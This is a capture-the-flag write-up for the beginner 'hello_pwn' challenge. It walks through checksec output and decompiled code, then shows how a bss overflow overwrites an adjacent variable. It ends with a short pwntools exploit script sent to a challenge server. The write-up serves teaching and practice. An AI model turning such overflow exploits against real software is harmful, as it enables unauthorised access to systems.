title: "Attack and Defense World hello_pwn" date: 2021-09-01 publish: true tags : ["CTF", "PWN", "bss", "NUAACTF"]
Challenge
Source: NUAACTF
Description: pwn!, segment fault!The rookie falls into deep thought.
Analysis
- segment fault
Related to segments.
Solution
checksec
Arch: amd64-64-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x400000)
Reverse Engineering
main
c
__int64 __fastcall main(int a1, char **a2, char **a3)
{
alarm(0x3Cu);
setbuf(stdout, 0LL);
puts("~~ welcome to ctf ~~ ");
puts("lets get helloworld for bof");
read(0, &unk_601068, 16uLL);
if ( dword_60106C == 'nuaa' )
sub_400686();
return 0LL;
}User input is stored at
unk_601068.When
dword_60106Cequals "nuaa", the functionsub_400686is executed.
sub_400686
c
__int64 sub_400686()
{
system("cat flag.txt");
return 0LL;
}Executing this function gives the flag.
Binary Analysis
bss Segment Overflow
.bss:0000000000601068 unk_601068 db ? ; ; DATA XREF: main+3B↑o
.bss:0000000000601069 db ? ;
.bss:000000000060106A db ? ;
.bss:000000000060106B db ? ;
.bss:000000000060106C dword_60106C dd ? ; DATA XREF: main+4A↑r
.bss:000000000060106C _bss endsunk_601068 and dword_60106C are both in the bss segment. A payload can be crafted to perform a bss segment overflow attack.
Select the area of unk_601068, right-click, and copy its size.
Its capacity is 4, so we need to write 4 characters to fill it, then write the required content for dword_60106C.
From the checksec phase, we know the program is little-endian, so "nuaa" needs to be reversed.
Payload: @@@@aaun
Exploit
python
from pwn import *
def main():
io = remote('111.200.241.244', 64589)
payload = '@'*4 + 'aaun'
io.sendline(payload.encode())
print(io.recvall().decode())
if __name__ == '__main__':
main()Summary
- Understand the program flow through simple reverse engineering.
- Discover that obtaining the flag requires satisfying a specific condition.
- Achieve the condition via bss segment overflow.